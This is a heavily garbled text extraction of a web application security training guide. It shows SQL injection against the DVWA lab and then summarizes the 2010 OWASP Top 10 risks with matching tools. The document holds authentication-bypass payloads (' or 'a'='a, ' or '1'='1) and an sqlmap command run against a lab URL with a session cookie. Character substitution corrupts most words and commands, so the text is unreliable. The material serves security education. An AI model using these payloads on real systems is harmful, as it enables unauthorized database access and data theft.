t'e user) t'e query !e'a<es correctly only if (ass ord does not contain a single-quote

#ersion $.%

&rint 'ate $( )an *%$+

&age *( of ,%

c'aracter* If t'e user enters IadminI as t'e username and Ie"am(le> %9 >a>,>aI as t'e (ass ord) t'e resulting query !ecomes S7L7CT F <R-0 users .@7R7 username G HadminH AB' pass!ord G He"ampleH -R HaHGHaHJ The P-R HaHGHaHP clause al ays e<aluates to true and t'e intended aut'entication c'ec& is !y(assed as a result* The HidH variable is vulnerable to S1L in/ection.
;SELECT <irs"=4()e> *(s"=4()e FROM -sers WHERE -ser=i, = '?i,';;

So !hen attac8er inser id G $ in the input field N2ser 'O and submit that, application !ill e"ecute follo!ing S1L ;uerry>
;SELECT <irs"=4()e> *(s"=4()e FROM -sers WHERE -ser=i, = '1';;

nsert <o**owi47 S8L s"ri47 i4"o i4#-" <ie*,$ ' or '('='( (4, #ress S-b)i" After s-b)i""i47 S8L s"ri47 res-*" is$

SQL Injection (Blind) 0anipulation of coo8ie data Start -.AS& DA& tool Ao to the '#.A login page and enter incorrect username and pass!ord &ress Login button ntercept @TT& re;uest

#ersion $.%

&rint 'ate $( )an *%$+

&age *= of ,%

Start Bac8Trac8( and run s;lmap tool Type follo!ing> python .Cs;lmap.py 3u http>CC$%.$.$.++Cdv!aCvulnerabilitiesCs;liRblindCIidG(KSubmitGSubmit 33coo8ie securityGlo!M &@&S7SS 'Gv8eb(vmgra$abb$ri9ta%,peb% 33level ( -.AS& DA& tool reports * alerts !ith @igh ris8 against S1L in/ection$

#ersion $.%

&rint 'ate $( )an *%$+

&age *9 of ,%

1 Appendix
The -.AS& Top $% .eb Application Security Ris8s(, as of the *%$% list, are>

1> )n*ection> o n/ection fla!s, such as S1L, -S, and L'A& in/ection, occur !hen untrusted data is sent to an interpreter as part of a command or ;uery. The attac8erEs hostile data can tric8 the interpreter into e"ecuting unintended commands or accessing unauthori?ed data. -> Cross#Site Scripting ./SS0
o

5SS fla!s occur !henever an application ta8es untrusted data and sends it to a !eb bro!ser !ithout proper validation and escaping. 5SS allo!s attac8ers to e"ecute scripts in the victimEs bro!ser !hich can hi/ac8 user sessions, deface !eb sites, or redirect the user to malicious sites. Application functions related to authentication and session management are often not implemented correctly, allo!ing attac8ers to compromise pass!ords, 8eys, session to8ens, or e"ploit other implementation fla!s to assume other usersE identities. A direct ob/ect reference occurs !hen a developer e"poses a reference to an internal implementation ob/ect, such as a file, directory, or database 8ey. .ithout an access control chec8 or other protection, attac8ers can manipulate these references to access unauthori?ed data.

1> 5ro4en ut"entication and Session Management

o

7> )nsecure Direct Ob*ect References

o

8> Cross#Site Re6uest 9orgery .CSR90 .2&'AT7 +C*$> Be! in3depth article on CSR< here0
o

A CSR< attac8 forces a logged3on victimEs bro!ser to send a forged @TT& re;uest, including the victimEs session coo8ie and any other automatically included authentication information, to a vulnerable !eb application. This allo!s the attac8er to force the victimEs bro!ser to generate re;uests the vulnerable application thin8s are legitimate re;uests from the victim. Aood security re;uires having a secure configuration defined and deployed for the application, frame!or8s, application server, !eb server, database server, and platform. All these settings should be defined, implemented, and maintained as many are not shipped !ith secure defaults. This includes 8eeping all soft!are up to date, including all code libraries used by the application. 0any !eb applications do not properly protect sensitive data, such as credit cards, SSBs, and authentication credentials, !ith appropriate encryption or

:> Security Misconfiguration

o

;> )nsecure Cryptograp"ic Storage

o

Reference> http>CCresources.infosecinstitute.comCo!asp3top3$%3tools3and3tacticsC

#ersion $.%

&rint 'ate $( )an *%$+

&age *: of ,%

hashing. Attac8ers may steal or modify such !ea8ly protected data to conduct identity theft, credit card fraud, or other crimes.

<> 9ailure to Restrict ,RL ccess

o

0any !eb applications chec8 2RL access rights before rendering protected lin8s and buttons. @o!ever, applications need to perform similar access control chec8s each time these pages are accessed, or attac8ers !ill be able to forge 2RLs to access these hidden pages any!ay. Applications fre;uently fail to authenticate, encrypt, and protect the confidentiality and integrity of sensitive net!or8 traffic. .hen they do, they sometimes support !ea8 algorithms, use e"pired or invalid certificates, or do not use them correctly. .eb applications fre;uently redirect and for!ard users to other pages and !ebsites, and use untrusted data to determine the destination pages. .ithout proper validation, attac8ers can redirect victims to phishing or mal!are sites, or use for!ards to access unauthori?ed pages.

=> )nsufficient Transport Layer 'rotection

o

10> ,n?alidated Redirects and 9orwards

o

<or nine of the -.AS& Top $% !eb application security ris8s !ill suggest a tool to help you identify and mitigate these ris8s !ithin your organi?ationEs !eb applications and services. !ill further endeavor to provide a uni;ue tool for each ris8 thus avoiding redundancy !hile providing you !ith multiple options. <ollo!ing is a ris8 and tool matri". R S[ 1> )n*ection -> Cross#Site Scripting ./SS0 1> 5ro4en ut"entication and Session Management 7> )nsecure Direct Ob*ect References 8> Cross#Site Re6uest 9orgery .CSR90 :> Security Misconfiguration ;> )nsecure Cryptograp"ic Storage <> 9ailure to Restrict ,RL ccess => )nsufficient Transport Layer 'rotection 10> ,n?alidated Redirects and 9orwards T--L
S+L )n*ect Me @ 'A /SS Me $ac45arA @ 'A &ebScarab

5urpA @ ' Tamper DataA 'inataA &ebScarab &atobo B/ Bi4to/&i4to CalomelA sslscan &atc"er

#ersion $.%

&rint 'ate $( )an *%$+

&age *9 of ,%

7 5ibliograp"y
$. http>CC!!!.cgisecurity.comCcsrf3fa;.htmlZcsrfuses *. https>CC!!!.o!asp.orgCinde".phpC0ainR&age ,. http>CCne!s.netcraft.comCarchivesC*%$*C%9C$%Cminimum3rsa3public38ey3lengths3 guidelines3or3rules.html +. http>CCresources.infosecinstitute.comCo!asp3top3$%3tools3and3tacticsC (. http>CCyehg.netC =. http>CC!!!.securiteam.comCsecurityrevie!sC('&%B$&9=7.html

#ersion $.%

&rint 'ate $( )an *%$+

&age ,% of ,%